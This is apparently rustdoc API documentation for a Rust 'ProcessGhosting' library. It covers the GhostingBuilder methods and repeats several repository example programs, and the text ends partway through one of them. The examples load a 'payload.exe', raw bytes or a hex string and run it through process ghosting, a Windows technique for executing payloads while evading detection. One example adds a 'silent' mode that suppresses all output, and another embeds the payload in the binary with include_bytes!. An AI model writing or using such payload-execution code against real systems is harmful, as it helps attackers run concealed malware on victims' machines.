pub struct GhostingBuilder { /* private fields */ }Expand description
Configuration builder for the ghosting operation
Implementations§
Source§impl GhostingBuilder
impl GhostingBuilder
Sourcepub fn new(payload: &[u8]) -> Self
pub fn new(payload: &[u8]) -> Self
Create a new builder with the payload bytes
Examples found in repository?
examples/silent_mode.rs (line 18)
6fn main() {
7 // No init() call = no banner
8
9 let payload = match std::fs::read("payload.exe") {
10 Ok(p) => p,
11 Err(_) => {
12 // Silent failure - no output
13 std::process::exit(1);
14 }
15 };
16
17 // Silent execution - no output at all
18 let result = GhostingBuilder::new(&payload)
19 .x64()
20 .silent() // Disable all output
21 .execute();
22
23 // Exit with appropriate code
24 std::process::exit(if result.is_ok() { 0 } else { 1 });
25}More examples
examples/basic_usage.rs (line 20)
6fn main() {
7 // Initialize library (prints banner)
8 init();
9
10 println!("[*] Basic Usage Example\n");
11
12 // Read payload from file
13 let payload_path = "payload.exe";
14
15 match std::fs::read(payload_path) {
16 Ok(payload) => {
17 println!("[+] Loaded payload: {} bytes", payload.len());
18
19 // Execute ghosting
20 let result = GhostingBuilder::new(&payload)
21 .x64() // Target x64 architecture
22 .with_logging() // Enable verbose output
23 .execute();
24
25 match result {
26 Ok(_) => println!("\n[+] Process ghosting completed successfully!"),
27 Err(e) => eprintln!("\n[-] Process ghosting failed: {}", e),
28 }
29 }
30 Err(e) => {
31 eprintln!("[-] Failed to read payload file '{}': {}", payload_path, e);
32 eprintln!(" Please provide a valid PE executable.");
33 }
34 }
35}examples/error_handling.rs (line 30)
6fn main() {
7 init();
8
9 println!("[*] Error Handling Example\n");
10
11 // Test 1: Invalid file
12 println!("[Test 1] Loading non-existent file:");
13 match GhostingBuilder::from_file("nonexistent.exe") {
14 Ok(_) => println!(" Unexpected success"),
15 Err(e) => println!(" Expected error: {}", e),
16 }
17 println!();
18
19 // Test 2: Invalid hex string
20 println!("[Test 2] Parsing invalid hex:");
21 match parse_hex_string("ZZZZ") {
22 Ok(_) => println!(" Unexpected success"),
23 Err(e) => println!(" Expected error: {}", e),
24 }
25 println!();
26
27 // Test 3: Invalid PE (not MZ header)
28 println!("[Test 3] Executing invalid PE:");
29 let invalid_pe = vec![0x00, 0x00, 0x00, 0x00]; // Not MZ
30 match GhostingBuilder::new(&invalid_pe).x64().execute() {
31 Ok(_) => println!(" Unexpected success"),
32 Err(e) => println!(" Expected error: {}", e),
33 }
34 println!();
35
36 // Test 4: Empty payload
37 println!("[Test 4] Empty payload:");
38 match GhostingBuilder::new(&[]).x64().execute() {
39 Ok(_) => println!(" Unexpected success"),
40 Err(e) => println!(" Expected error: {}", e),
41 }
42 println!();
43
44 // Test 5: Truncated PE
45 println!("[Test 5] Truncated PE (only MZ header):");
46 let truncated_pe = vec![0x4D, 0x5A]; // Just MZ
47 match GhostingBuilder::new(&truncated_pe).x64().execute() {
48 Ok(_) => println!(" Unexpected success"),
49 Err(e) => println!(" Expected error: {}", e),
50 }
51 println!();
52
53 println!("[*] Error handling tests complete.");
54}examples/full_demo.rs (line 80)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn from_hex_array(hex_bytes: &[u8]) -> Self
pub fn from_hex_array(hex_bytes: &[u8]) -> Self
Create from hex array format: &[0x4D, 0x5A, 0x90, …]
Sourcepub fn from_hex_string(hex_string: &str) -> Result<Self, String>
pub fn from_hex_string(hex_string: &str) -> Result<Self, String>
Create from hex string like “4D5A90” or “4D 5A 90” or “0x4D, 0x5A, 0x90”
Examples found in repository?
examples/from_hex.rs (line 39)
6fn main() {
7 init();
8
9 println!("[*] From Hex String Example\n");
10
11 // Example: Various hex formats supported
12 let hex_formats = [
13 ("Continuous", "4D5A90000300000004000000FFFF0000"),
14 ("Spaced", "4D 5A 90 00 03 00 00 00"),
15 ("C-style", "0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00"),
16 ("Escaped", "\\x4D\\x5A\\x90\\x00\\x03\\x00"),
17 ];
18
19 println!("[*] Supported hex formats:\n");
20
21 for (name, hex) in &hex_formats {
22 match parse_hex_string(hex) {
23 Ok(bytes) => {
24 println!(" {}: {} -> {:02X?}", name, hex, &bytes[..bytes.len().min(4)]);
25 }
26 Err(e) => {
27 println!(" {}: Error - {}", name, e);
28 }
29 }
30 }
31
32 println!();
33
34 // For actual execution, you would use a complete PE file in hex
35 // This is just a demonstration of the parsing
36
37 let sample_hex = "0x4D, 0x5A, 0x90, 0x00"; // MZ header start
38
39 match GhostingBuilder::from_hex_string(sample_hex) {
40 Ok(builder) => {
41 println!("[+] Successfully parsed hex string");
42 println!("[*] Payload size: {} bytes", builder.build().payload.len());
43
44 // Note: This would fail with just the header
45 // In real usage, provide complete PE bytes
46 // builder.x64().execute();
47 }
48 Err(e) => {
49 eprintln!("[-] Failed to parse: {}", e);
50 }
51 }
52}More examples
examples/full_demo.rs (line 100)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn from_file(file_path: &str) -> Result<Self, String>
pub fn from_file(file_path: &str) -> Result<Self, String>
Create from a file path
Examples found in repository?
examples/from_file.rs (line 23)
7fn main() {
8 init();
9
10 println!("[*] From File Example\n");
11
12 // Get file path from command line or use default
13 let args: Vec<String> = env::args().collect();
14 let file_path = if args.len() > 1 {
15 &args[1]
16 } else {
17 "payload.exe"
18 };
19
20 println!("[*] Loading payload from: {}", file_path);
21
22 // Use from_file builder method
23 match GhostingBuilder::from_file(file_path) {
24 Ok(builder) => {
25 let result = builder
26 .x64()
27 .with_logging()
28 .execute();
29
30 match result {
31 Ok(_) => println!("\n[+] Success!"),
32 Err(e) => eprintln!("\n[-] Failed: {}", e),
33 }
34 }
35 Err(e) => {
36 eprintln!("[-] Failed to load file: {}", e);
37 }
38 }
39}More examples
examples/architecture_selection.rs (line 41)
7fn main() {
8 init();
9
10 println!("[*] Architecture Selection Example\n");
11
12 let args: Vec<String> = env::args().collect();
13
14 // Parse arguments
15 let (file_path, arch) = if args.len() >= 3 {
16 let arch = match args[2].to_lowercase().as_str() {
17 "x86" | "32" | "i386" => Architecture::X86,
18 "x64" | "64" | "amd64" => Architecture::X64,
19 _ => {
20 eprintln!("[-] Unknown architecture: {}", args[2]);
21 eprintln!(" Use: x86, x64, 32, or 64");
22 return;
23 }
24 };
25 (args[1].as_str(), arch)
26 } else if args.len() == 2 {
27 (args[1].as_str(), Architecture::X64) // Default to x64
28 } else {
29 println!("Usage: {} <payload.exe> [arch]", args[0]);
30 println!();
31 println!("Architectures:");
32 println!(" x86, 32, i386 - 32-bit");
33 println!(" x64, 64, amd64 - 64-bit (default)");
34 return;
35 };
36
37 println!("[*] File: {}", file_path);
38 println!("[*] Architecture: {}", arch);
39 println!();
40
41 match GhostingBuilder::from_file(file_path) {
42 Ok(builder) => {
43 let result = builder
44 .architecture(arch)
45 .with_logging()
46 .execute();
47
48 match result {
49 Ok(_) => println!("\n[+] Success!"),
50 Err(e) => eprintln!("\n[-] Failed: {}", e),
51 }
52 }
53 Err(e) => eprintln!("[-] Error: {}", e),
54 }
55}examples/error_handling.rs (line 13)
6fn main() {
7 init();
8
9 println!("[*] Error Handling Example\n");
10
11 // Test 1: Invalid file
12 println!("[Test 1] Loading non-existent file:");
13 match GhostingBuilder::from_file("nonexistent.exe") {
14 Ok(_) => println!(" Unexpected success"),
15 Err(e) => println!(" Expected error: {}", e),
16 }
17 println!();
18
19 // Test 2: Invalid hex string
20 println!("[Test 2] Parsing invalid hex:");
21 match parse_hex_string("ZZZZ") {
22 Ok(_) => println!(" Unexpected success"),
23 Err(e) => println!(" Expected error: {}", e),
24 }
25 println!();
26
27 // Test 3: Invalid PE (not MZ header)
28 println!("[Test 3] Executing invalid PE:");
29 let invalid_pe = vec![0x00, 0x00, 0x00, 0x00]; // Not MZ
30 match GhostingBuilder::new(&invalid_pe).x64().execute() {
31 Ok(_) => println!(" Unexpected success"),
32 Err(e) => println!(" Expected error: {}", e),
33 }
34 println!();
35
36 // Test 4: Empty payload
37 println!("[Test 4] Empty payload:");
38 match GhostingBuilder::new(&[]).x64().execute() {
39 Ok(_) => println!(" Unexpected success"),
40 Err(e) => println!(" Expected error: {}", e),
41 }
42 println!();
43
44 // Test 5: Truncated PE
45 println!("[Test 5] Truncated PE (only MZ header):");
46 let truncated_pe = vec![0x4D, 0x5A]; // Just MZ
47 match GhostingBuilder::new(&truncated_pe).x64().execute() {
48 Ok(_) => println!(" Unexpected success"),
49 Err(e) => println!(" Expected error: {}", e),
50 }
51 println!();
52
53 println!("[*] Error handling tests complete.");
54}examples/full_demo.rs (line 90)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn architecture(self, arch: Architecture) -> Self
pub fn architecture(self, arch: Architecture) -> Self
Set the target architecture
Examples found in repository?
examples/architecture_selection.rs (line 44)
7fn main() {
8 init();
9
10 println!("[*] Architecture Selection Example\n");
11
12 let args: Vec<String> = env::args().collect();
13
14 // Parse arguments
15 let (file_path, arch) = if args.len() >= 3 {
16 let arch = match args[2].to_lowercase().as_str() {
17 "x86" | "32" | "i386" => Architecture::X86,
18 "x64" | "64" | "amd64" => Architecture::X64,
19 _ => {
20 eprintln!("[-] Unknown architecture: {}", args[2]);
21 eprintln!(" Use: x86, x64, 32, or 64");
22 return;
23 }
24 };
25 (args[1].as_str(), arch)
26 } else if args.len() == 2 {
27 (args[1].as_str(), Architecture::X64) // Default to x64
28 } else {
29 println!("Usage: {} <payload.exe> [arch]", args[0]);
30 println!();
31 println!("Architectures:");
32 println!(" x86, 32, i386 - 32-bit");
33 println!(" x64, 64, amd64 - 64-bit (default)");
34 return;
35 };
36
37 println!("[*] File: {}", file_path);
38 println!("[*] Architecture: {}", arch);
39 println!();
40
41 match GhostingBuilder::from_file(file_path) {
42 Ok(builder) => {
43 let result = builder
44 .architecture(arch)
45 .with_logging()
46 .execute();
47
48 match result {
49 Ok(_) => println!("\n[+] Success!"),
50 Err(e) => eprintln!("\n[-] Failed: {}", e),
51 }
52 }
53 Err(e) => eprintln!("[-] Error: {}", e),
54 }
55}More examples
examples/full_demo.rs (line 122)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
